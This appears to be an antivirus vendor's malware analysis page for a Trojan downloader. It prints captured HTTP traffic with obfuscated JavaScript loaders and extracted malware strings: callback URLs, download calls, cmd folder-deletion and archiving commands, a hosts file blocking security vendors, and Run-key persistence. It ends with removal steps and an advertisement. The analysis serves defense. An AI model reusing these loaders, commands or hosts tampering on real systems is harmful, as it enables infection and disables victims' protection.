49)break;do_[fo]=((~do_[fo])&0xff)^112;do_[fo]=(-do_[fo])&0xff;fo  ;}"
;eval(fo);eo="";for(fo=1;fo<do_.length-1;fo  )if(fo%6)eo =Strin
<<< skipped >>>


GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   85
Pragma: no-cache
Cache-control: no-store
<html><body><script>var it="/........",jt="djfz2",mt
,kt=new Array(),lt;function gt(ht){for(mt=0;mt<lt.length;mt  )kt[mt
]=lt.charCodeAt(mt);mt=49;do{if(mt<3)break;kt[mt]=((kt[mt] kt[mt-1]
)&0xff)^131;mt--;}while(true);for(mt=51;;){if(mt<1)break;kt[mt]=(kt
[mt] kt[mt-1])&0xff;mt--;}mt="mt=49;do{kt[mt]=((((((kt[mt]-kt[mt-1])&0
xff) 208)&0xff)<<7)&0xff)|(((((kt[mt]-kt[mt-1])&0xff) 208)&0xff)
>>1);}while(--mt>=2);";eval(mt);lt="";for(mt=1;mt<kt.lengt
h-1;mt  )if(mt%6)lt =String.fromCharCode(kt[mt]^ht);eval("mt=eval;mt(l
t);");}lt="\x1a\xa3\x91\x0e\x8f\x85 \xa1\xfbA\xd8\xe9\x1b/\x88;\xf1I\x
f0kG\xbf\xe8\x1d\xc75V/\xfb\xa7\x85\xbc\x19\xc7\x83\xde\xf1w\xc74\x91\
x0f\xc6O\x17\x97\xf0I\x9b\x9d&z\xbe\x91";gt(202);</script><sc
ript>var u=2;for(;u==1;u  );</script><br><br><
br><center><h3><p>..............................J
avaScript</p></h3></center></body></html>
;..



GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function rrxbwVS(){var y="46,62,114,114,103,118,106,100,
120,60,120,56,107,56,53";return eval("String.fromCharCode(" y ")");}fu
nction fykzrDK(tIzM){var b;var G;b="";for(var a=0;a<tIzM.length;a  
){G=tIzM.charCodeAt(a)^15;b =String.fromCharCode(G^14);}return b;}func
tion fbhvhWI(){var cEmV = document.getElementById("pVoM").value;var qP
hY=rrxbwVS();window.location=fykzrDK(qPhY) cEmV;}function sgwdvJF(){va
r y="107,53,104,52,53";return eval("String.fromCharCode(" y ")");}<
/script><html><br><br><br><center><
;h3><font color="#3C3C3C">..............:</font><fon
t color="blue"><script>var cAtE=sgwdvJF();document.write(fykz
rDK(cAtE));</script>  </font><input id="pVoM">   <
;input type=button value="................" onmouseup="fbhvhWI()">&
lt;br><br></h3><center></html>HTTP/1.1 200 
OK..Server: safeshield/v2..Content-Length: 753..Content-Type: text/htm
l; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires:
 Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey
=actzmz..<script>function nwcznTK(){var x="16,0,76,76,89,72,84,9
0,70,2,70,6,85,6,11";return eval("String.fromCharCode(" x ")");}functi
on vzhssNW(){var kGnY = document.getElementById("rRaS").value;var gYgG
=nwcznTK();window.location=twxhsZL(gYgG) kGnY;}function twxhsZL(mOjI){
var s;var X;s="";for(var a=0;a<mOjI.length;a  ){X=mOjI.charCodeAt(a
)^32;s =String.fromCharCode(X^31);}return s;}function cgtziVX(){va
<<< skipped >>>


GET /.........rar?rqckm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
Cookie: ssfwkey=actzmz


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function jvlloAB(iWlZ){var e;var X;e="";for(var m=0;m<
;iWlZ.length;m  ){X=iWlZ.charCodeAt(m)^17;e =String.fromCharCode(X^16)
;}return e;}function fedavTX(){var k="46,62,114,114,103,118,106,100,12
0,60,120,56,107,56,53";return eval("String.fromCharCode(" k ")");}func
tion mfofrCD(){var eBqV = document.getElementById("jPlK").value;var xC
eM=fedavTX();window.location=jvlloAB(xCeM) eBqV;}function nzrqhXY(){va
r k="107,53,104,52,53";return eval("String.fromCharCode(" k ")");}<
/script><html><br><br><br><center><
;h3><font color="#3C3C3C">..............:</font><fon
t color="blue"><script>var yGiK=nzrqhXY();document.write(jvll
oAB(yGiK));</script>  </font><input id="jPlK">   <
;input type=button value="................" onmouseup="mfofrCD()">&
lt;br><br></h3><center></html>..



GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.86jfw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 9337155
Content-Type: application/octet-stream
Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT
Accept-Ranges: bytes
ETag: "7cee72e7991d01:29b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:12 GMT
Connection: keep-alive
[email protected].. .....Y....pE.3.. ............exe..j"^y
h$.f..exe...L-.....X.P......8....y8..n..t.....Gt...d..?%...../.B&.....
...k;...x.. .....>......x.....~?.4v.4..#$~....B. 3..k{c#z.P...[[c..
...{.X.7........."..../.$]..y.6.....o..L.....Z..[E.2....:.s.V.$...D..1
...../c._.;j[.2..mK........z#..........e'..m.....?..{3./.W...SP..'...~
.....s........h...f...\..A..G........?.V.....a....c.........O....A/...
.P...5....._......V.........#.W..&. ........n...7...........J....t....
...0..............'T2..O`...Eo..].U.......5%o.L...>*.h...N.^..C.b.\
T`.x ..........[XW`......B....8n...<a.x.....,..Az.."CW..^MD...-.F..
...q... ....;.Z...@.....;.. ....U...O.}o...2.@.(...M2..k.. o.n.{.^..f7
..9......T.BqO....s..@..&.ou.............cOy&.....W,.j4.......g..'..&l
t;...........B8.)..$IH}Iw:[email protected]]a...c....-fT_p"b#6...._&
gt;>.tl_.d.....'.sy.#...;.....5..<....0.....`........8T....e6.e.
52.....LG....5..Z...y"RU..|...{6........g..H.l~.C{[email protected]
.^m.7.St..j*..:...3.........W"o-..c...N...s.R....{C..... .WrP......!.d
bJ.... .K:.w...m........Y.\....u.n..b.=.".....h....p.....7|2.t....n...
.op...[..s!."....<|.s[...=T.X9q. `....9..-P&...g./. ..H6..h.r.>k
[email protected]#...Z...f../&?=...<...(...6UA8.iT..r..8....)...H6#....1..Zk~.
..?|....z#...zOv.....[....C...`q.y...4..c..B%]=#kR.<...._.P...7....
.....!........r........T(.(.$.M.{..}.|.. ..xfC4...W........*. ....L0..
.*F.|.......M_1..,Gy.Pf0._i._....._qD[=...CF.2#jFU..q.l.3.~..>.....
_.$....orY..h.")...."Z.K<..........;{K..a.l......v.i...d.|....r
<<< skipped >>>


GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function wrzdkIW(dSgS){var d;var T;d="";for(var u=0;u<
;dSgS.length;u  ){T=dSgS.charCodeAt(u)^86;d =String.fromCharCode(T^85)
;}return d;}function apeuzOV(){var rEdS = document.getElementById("jNe
M").value;var rExN=wlphoNK();window.location=wrzdkIW(rExN) rEdS;}funct
ion aipebBB(){var n="105,55,106,54,55";return eval("String.fromCharCod
e(" n ")");}function wlphoNK(){var n="44,60,112,112,101,116,104,102,12
2,62,122,58,105,58,55";return eval("String.fromCharCode(" n ")");}<
/script><html><br><br><br><center><
;h3><font color="#3C3C3C">..............:</font><fon
t color="blue"><script>var cUsF=aipebBB();document.write(wrzd
kIW(cUsF));</script>  </font><input id="jNeM">   <
;input type=button value="................" onmouseup="apeuzOV()">&
lt;br><br></h3><center></html>HTTP/1.1 200 
OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/htm
l; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires:
 Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey
=actzmz..<script>function knhtiIU(kZaE){var y;var X;y="";for(var
 o=0;o<kZaE.length;o  ){X=kZaE.charCodeAt(o)^38;y =String.fromCharC
ode(X^37);}return y;}function wocbkUA(){var jZfO = document.getElement
ById("gFuI").value;var cDgG=rfhtsNF();window.location=knhtiIU(cDgG) jZ
fO;}function xvggoOQ(){var b="105,55,106,54,55";return eval("String.fr
omCharCode(" b ")");}function rfhtsNF(){var b="44,60,112,112,101,1
<<< skipped >>>


GET /.........rar?rbbkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
Cookie: ssfwkey=actzmz


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 753
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function zrhbxSP(){var j="16,0,76,76,89,72,84,90,70,2,70
,6,85,6,11";return eval("String.fromCharCode(" j ")");}function ibgnwD
X(){var gWmA = document.getElementById("dLuC").value;var wBjA=zrhbxSP(
);window.location=cpwbpDX(wBjA) gWmA;}function cpwbpDX(dNsY){var z;var
 Q;z="";for(var o=0;o<dNsY.length;o  ){Q=dNsY.charCodeAt(o)^32;z =S
tring.fromCharCode(Q^31);}return z;}function adyufDW(){var j="85,11,86
,10,11";return eval("String.fromCharCode(" j ")");}</script><
html><br><br><br><center><h3><font
 color="#3C3C3C">..............:</font><font color="blue"&
gt;<script>var gXoP=adyufDW();document.write(cpwbpDX(gXoP));<
/script>  </font><input id="dLuC">   <input type=but
ton value="................" onmouseup="ibgnwDX()"><br><br
></h3><center></html>..



GET /.................rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.zz12320.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   82
Pragma: no-cache
Cache-control: no-store
<html><body><br><br><br><center>&l
t;h3><a href="#" onmouseup="ef(205)">..............</a>
</h3></center><script></script><script>v
ar gf="/................",hf="yqjs1",kf,if_=new Array(),jf;function ef
(ff){for(kf=0;kf<jf.length;kf  )if_[kf]=jf.charCodeAt(kf);for(kf=49
;kf>=2;kf--){if_[kf]=(~((((if_[kf]-78)&0xff) 252)&0xff))&0xff;}kf="
kf=4;while(true){if(kf>51)break;if_[kf]=(if_[kf]-if_[kf 1])&0xff;kf
  ;}";eval(kf);kf=51;while(kf>=2){if_[kf]=((((((if_[kf]-if_[kf-1])&
0xff)-142)&0xff)<<4)&0xff)|(((((if_[kf]-if_[kf-1])&0xff)-142)&0x
ff)>>4);kf--;}jf="";for(kf=1;kf<if_.length-1;kf  )if(kf%7)jf 
=String.fromCharCode(if_[kf]^ff);eval("kf=eval");kf(jf);}jf="=\xba\xbf
\xf7\xb57q\xe4\x9e$R8\x96L -\x07\x99\xf3\xea\x19\x90\xdc$\xf8\x98\xc1B
L\xb2\xd5\x81\xb5r\x27t<Pl\xb0<\x01\xbe\x1f\x98\xea\xd9\xe1u\x05
n\xa8\x9a";</script></body></html>HTTP/1.0 200 OK..C
ontent-Type: text/html..Content-Length:   827.Pragma: no-cache..Cache-
control: no-store..<html><body><br><br><br&
gt;<center><h3><a href="#" onmouseup="ef(205)">.....
.........</a></h3></center><script></script
><script>var gf="/................",hf="yqjs1",kf,if_=new Arr
ay(),jf;function ef(ff){for(kf=0;kf<jf.length;kf  )if_[kf]=jf.charC
odeAt(kf);for(kf=49;kf>=2;kf--){if_[kf]=(~((((if_[kf]-78)&0xff) 252
)&0xff))&0xff;}kf="kf=4;while(true){if(kf>51)break;if_[kf]=(if_
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

regsvr32.exe_1680:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration

svchost.exe_592:

.text
`.rdata
@.data
.rsrc
ADVAPI32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
SHLWAPI.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/fuy733.html
192.168.200.113:8080
%u.%u.%u.%u
hra%u.dll
VVV.mojimojimojimoji.com:38774
192.168.200.113:1050
iexplore.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
urlmon.dll
%c%c%c%c%c.exe
PlusCtrl.dll
%c%c%c%c%c%c.exe
%u MB
%u MHz
Windows NT
Windows 7
Windows 2008
Windows Vista
Windows 2003
Windows XP
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
#0%s!
%s/%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
192.168.1.244
svchost.exe
ntdll.dll
@.reloc
lpk.dll
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe

svchost.exe_592_rwx_00400000_0000C000:

.text
`.rdata
@.data
.rsrc
ADVAPI32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
SHLWAPI.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/fuy733.html
192.168.200.113:8080
%u.%u.%u.%u
hra%u.dll
VVV.mojimojimojimoji.com:38774
192.168.200.113:1050
iexplore.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
urlmon.dll
%c%c%c%c%c.exe
PlusCtrl.dll
%c%c%c%c%c%c.exe
%u MB
%u MHz
Windows NT
Windows 7
Windows 2008
Windows Vista
Windows 2003
Windows XP
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
#0%s!
%s/%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
192.168.1.244
svchost.exe
ntdll.dll
@.reloc
lpk.dll
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe

kmokq.exe_1948:

.text
`.rdata
@.data
KERNEL32.dll
EnumWindows
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
WS2_32.dll
MSVCP60.dll
MSVCRT.dll
DeleteUrlCacheEntry
WININET.dll
URLDownloadToFileA
urlmon.dll
SHLWAPI.dll
hXXp://623968.6600.org:99/3.htm
201405131714
124.232.158.160
dk.23145.com
Applications\iexplore.exe\SHELL\OPEN\COMMAND
hXXp://
%s?%c%c%c%c%c
%s%c%c%c%c%c.htm
hXXp://VVV.sfy365.com/1.78
hXXp://VVV.yao933.com/
124.232.141.61

QQExtrenal.exe_3124:

.text
`.data
.rsrc
MSVBVM60.DLL
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 kaba365.com
xxD.Downloader
VB5!6&vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
RegCreateKeyA
RegCloseKey
VBA6.DLL
c:\windows\system32\jarinet
cmd /c taskkill /f /im QQExtrenal.exe
hXXp://
%System%\drivers\etc\hosts
Microsoft.XMLHTTP
Adodb.Stream
c:\windows\inf\
Software\Microsoft\Windows\CurrentVersion\Run
c:\windows\system32\jarinet\QQExtrenal.exe
c:\windows\system32\jarinet\QQExtrenal.exe "
.exe"
xxDown.exe

comine.exe_3324:

.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
psapi.dll
kernel32.dll
NTDLL.DLL
shell32.dll
SHFileOperationA
ShellExecuteA
VBA6.DLL
1.vbp
hXXp://VVV.hao12338.com/?index
IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE
%Program Files%\Windows Media Player
%Program Files%
explorer.exe
WScript.Shell
Iexplore.exe
wscript.shell
cmd /c ping 127.0.0.1 -n 2&del
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
%Program Files%\Windows Media Player\comine.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
%Program Files%\Internet Explorer\iexplore.exe
WindowStyle
Hotkey
serv.dat

news4979.exe_3348:

.text
`.data
.rsrc
MSVBVM60.DLL
WebBrowser2
SHDocVwCtl.WebBrowser
WebBrowser1
vb6chs.dll
shdocvw.dll
WebBrowser
4%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
shell32.dll
ShellExecuteA
psapi.dll
EnumWindows
psapi.dll
RegCreateKeyExA
RegOpenKeyExA
VBA6.DLL
hXXp:///
%Program Files%
@isual Studio\VB98\LINK.EXE.M
1.vbp
yyg.so
hXXp://96xx.net/tj2.html?1114
hXXp://wei.96xx.net/index.php?m=weixin&a=order&id=89
Chrome_WidgetWin
360se.exe
baidu.com
hao123.com
chrome.exe
sogouexplorer.exe
baidubrowser.exe
360chrome.exe
maxthon.exe
qqbrowser.exe
iexplore.exe
\Google Chrome.lnk
\Internet Explorer.lnk
wscript.shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop
Wscript.shell
C:\Users\Public\Desktop\
C:\Users\Public\Desktop


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    taskkill.exe:2984
    kmokq.exe:1948
    auiay.exe:2924
    regsvr32.exe:1680
    hrl1.tmp:1736

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\drivers\etc\hosts (898 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\»ÊÕߣ¸£°ÐÇÍõºÏ»÷[1].htm (827 bytes)
    %WinDir%\Temp\rhdkm.htm (826 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ô´«Ææ[1].htm (4591 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[1].htm (984 bytes)
    %WinDir%\Temp\rbrkm.htm (2361 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[2].rar (1338 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÍõÕßÍøÂç[1].htm (1678 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[2].htm (803 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[1].rar (14456 bytes)
    %WinDir%\Temp\rkrkm.htm (11918 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÐÇ[1].rar (782 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\²ÆÉñ¢áÐÇ[1].rar (1338 bytes)
    %WinDir%\Temp\rqckm.htm (768 bytes)
    %WinDir%\Temp\rbbkm.htm (753 bytes)
    %WinDir%\Temp\rqrkm.htm (984 bytes)
    %System%\jarinet\QQExtrenal.exe (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)
    %System%\eeeaea.exe (37 bytes)

  4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now